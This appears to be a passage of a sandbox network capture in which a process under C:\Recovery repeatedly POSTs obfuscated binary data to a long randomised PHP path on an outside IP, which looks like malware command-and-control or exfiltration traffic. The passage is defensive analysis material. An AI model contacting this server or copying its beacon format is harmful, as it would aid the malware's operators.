Aug 1, 2024 04:28:36.252756119 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49763	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:38.058491945 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:38.409181118 CEST	2512	OUT	Data Raw: 5d 53 5c 56 5a 43 57 5e 5e 5a 5a 56 50 57 50 5b 55 50 5c 5a 54 5e 5a 5b 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]S\VZCW^^ZZVPWP[UP\ZT^Z[YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&+:7(Y)0=>?&#('^<#0.!T7R(.4Y0=9^/.]+
Aug 1, 2024 04:28:38.885725975 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:39.024631977 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49764	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:39.082931995 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 1960 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:39.441781998 CEST	1960	OUT	Data Raw: 58 52 5c 57 5f 43 57 5b 5e 5a 5a 56 50 5e 50 5d 55 56 5c 5b 54 5a 5a 51 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XR\W_CW[^ZZVP^P]UV\[TZZQYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%+3=4?#=2Z(?:6+3\(;^'>%P4/(&#Q 0=9^/.]+3
Aug 1, 2024 04:28:39.926704884 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:40.067157030 CEST	380	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:39 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0e 1e 26 57 22 1f 2a 02 37 3d 20 53 2d 5c 35 01 28 0d 0c 5b 2a 12 02 13 25 23 24 0a 3c 3e 3f 02 3d 3c 34 12 31 3d 33 0c 34 12 3d 55 2b 1c 2a 46 0c 10 25 5e 2b 3d 23 1d 25 01 28 0d 3a 09 3d 42 25 3e 19 10 21 3f 22 16 37 3b 27 05 3f 5e 28 56 27 17 24 51 3a 2d 26 5c 26 37 00 5a 21 25 2a 54 02 15 27 51 29 03 07 5b 26 31 37 01 25 2c 3b 53 26 2d 3d 5f 21 5a 2d 58 22 29 29 07 33 06 23 52 28 2d 2c 14 26 01 09 07 29 1f 21 53 23 2d 20 50 2a 01 2c 57 00 35 57 54 Data Ascii: &W"7= S-\5([%#$<>?=<41=34=U+F%^+=#%(:=B%>!?"7;'?^(V'$Q:-&\&7Z!%T'Q)[&17%,;S&-=_!Z-X"))3#R(-,&)!S#- P*,W5WT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49765	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:39.146636963 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:39.502939939 CEST	2512	OUT	Data Raw: 58 52 5c 52 5f 42 57 52 5e 5a 5a 56 50 5d 50 5f 55 50 5c 5c 54 50 5a 5c 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XR\R_BWR^ZZVP]P_UP\\TPZ\YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&(%!,_=U!)/&6+(;+%.#X<V(%Y 48X09^/.]+/
Aug 1, 2024 04:28:39.949520111 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:40.081511021 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:39 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49766	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:41.350894928 CEST	478	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue
Aug 1, 2024 04:28:41.706020117 CEST	2512	OUT	Data Raw: 58 5f 5c 5f 5f 42 57 5d 5e 5a 5a 56 50 59 50 59 55 5f 5c 58 54 5b 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: X_\__BW]^ZZVPYPYU_\XT[Z]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%X(-U#/7?#.[>&"]3?;+Y'>9Q"=;(*#7(_$-9^/.]+
Aug 1, 2024 04:28:42.172766924 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:42.305392981 CEST	151	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49767	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:42.493480921 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:42.848356009 CEST	2512	OUT	Data Raw: 5d 54 5c 56 5f 41 57 59 5e 5a 5a 56 50 5b 50 5e 55 54 5c 5d 54 50 5a 5c 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]T\V_AWY^ZZVP[P^UT\]TPZ\YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&?9W4<(]#9<!"$*8;^$-##<&"'^&=9^/.]+7
Aug 1, 2024 04:28:43.289576054 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:43.468014956 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49768	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:44.604968071 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:44.956042051 CEST	2512	OUT	Data Raw: 58 5e 59 54 5f 43 52 58 5e 5a 5a 56 50 5d 50 51 55 55 5c 51 54 58 5a 5a 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: X^YT_CRX^ZZVP]PQUU\QTXZZYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%+U5V!< _=3&>!W"(?X<'_067<+*7''&=9^/.]+/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49769	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:45.088018894 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 1996 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:45.442682028 CEST	1996	OUT	Data Raw: 5d 56 59 54 5f 4a 57 5e 5e 5a 5a 56 50 58 50 5d 55 5e 5c 59 54 5f 5a 5e 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]VYT_JW^^ZZVPXP]U^\YT_Z^YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&?#,4>1)?%Q68,+;#_'-& /<644 Y'-9^/.]+;
Aug 1, 2024 04:28:45.895598888 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:46.023324013 CEST	380	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:45 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0e 1e 26 57 22 36 3e 07 23 10 28 56 3a 39 39 00 3c 0a 25 02 2a 3c 28 5a 30 20 38 0e 28 2d 38 5b 3d 2f 23 00 32 3e 20 12 23 3f 3e 0e 28 0c 2a 46 0c 10 26 06 3f 04 20 09 31 01 2c 0c 3a 0e 0f 43 31 10 3b 58 35 11 36 52 20 3b 02 58 28 38 19 0c 30 39 2c 1a 3a 00 26 16 31 37 04 59 21 35 2a 54 02 15 27 53 3d 5b 3e 06 33 31 2b 00 25 3c 24 0f 26 10 29 1d 35 2c 29 5b 22 39 35 06 27 38 0d 51 28 2e 0e 52 25 01 05 07 2a 32 3a 0b 21 17 20 50 2a 01 2c 57 00 35 57 54 Data Ascii: &W"6>#(V:99<%<(Z0 8(-8[=/#2> #?>(F&? 1,:C1;X56R ;X(809,:&17Y!5T'S=[>31+%<$&)5,)["95'8Q(.R%2:! P*,W5WT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49770	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:45.273287058 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:45.627814054 CEST	2512	OUT	Data Raw: 5d 56 59 56 5a 44 52 5e 5e 5a 5a 56 50 5d 50 5a 55 55 5c 50 54 5e 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]VYVZDR^^ZZVP]PZUU\PT^Z]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&<&48_* .^=<5!;0(Z0.%Q#-8):9Z#44_09^/.]+/
Aug 1, 2024 04:28:46.069933891 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:46.203649044 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49771	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:46.364351988 CEST	478	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue
Aug 1, 2024 04:28:46.723465919 CEST	2512	OUT	Data Raw: 5d 54 5c 55 5f 42 57 53 5e 5a 5a 56 50 57 50 5c 55 52 5c 58 54 5b 5a 51 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]T\U_BWS^ZZVPWP\UR\XT[ZQYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%Z(3%# \>02]),68;]++$)48+Y7'^0=9^/.]+
Aug 1, 2024 04:28:47.165344000 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:47.348716021 CEST	151	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49772	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:47.944209099 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2504 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:48.300312996 CEST	2504	OUT	Data Raw: 58 51 5c 52 5a 43 57 58 5e 5a 5a 56 50 5e 50 58 55 53 5c 51 54 5e 5a 58 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XQ\RZCWX^ZZVP^PXUS\QT^ZXYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%X<#%U <;=\)5;3*+$>5W73?:&#74]3=9^/.]+'
Aug 1, 2024 04:28:48.767235041 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:48.945471048 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49773	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:49.306524038 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:49.660434961 CEST	2512	OUT	Data Raw: 58 5f 5c 50 5a 44 57 5f 5e 5a 5a 56 50 5b 50 5e 55 54 5c 5f 54 51 5a 5c 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: X_\PZDW_^ZZVP[P^UT\_TQZ\YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&?)V# \>2))U6+#(+3[%=:".+<:!_77 09^/.]+7
Aug 1, 2024 04:28:50.120312929 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:50.251307011 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:49 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49774	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:51.197138071 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 2512 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:51.550384998 CEST	2512	OUT	Data Raw: 5d 53 59 51 5f 42 57 58 5e 5a 5a 56 50 59 50 5d 55 56 5c 59 54 5b 5a 5a 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: ]SYQ_BWX^ZZVPYP]UV\YT[ZZYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%Z+)T4<_)3)=5"++$=*7$R(: $$]$-9^/.]+
Aug 1, 2024 04:28:52.019542933 CEST	25	IN	HTTP/1.1 100 Continue
Aug 1, 2024 04:28:52.200499058 CEST	207	IN	HTTP/1.1 200 OK Date: Thu, 01 Aug 2024 02:28:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 56 5f 5a Data Ascii: <V_Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49775	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

Timestamp	Bytes transferred	Direction	Data
Aug 1, 2024 04:28:51.311700106 CEST	502	OUT	POST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.58.42.154 Content-Length: 1996 Expect: 100-continue Connection: Keep-Alive
Aug 1, 2024 04:28:51.659097910 CEST	1996	OUT	Data Raw: 58 50 5c 54 5a 47 57 5b 5e 5a 5a 56 50 59 50 51 55 57 5c 5b 54 50 5a 5c 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58 Data Ascii: XP\TZGW[^ZZVPYPQUW\[TPZ\YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%(0&7Z4X=01(?:5?^?;?Y3=7=;):9#$^0=9^/.]+
Aug 1, 2024 04:28:52.113900900 CEST	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49776	194.58.42.154	80	7860	C:\Recovery\HpQPPZazcv.exe

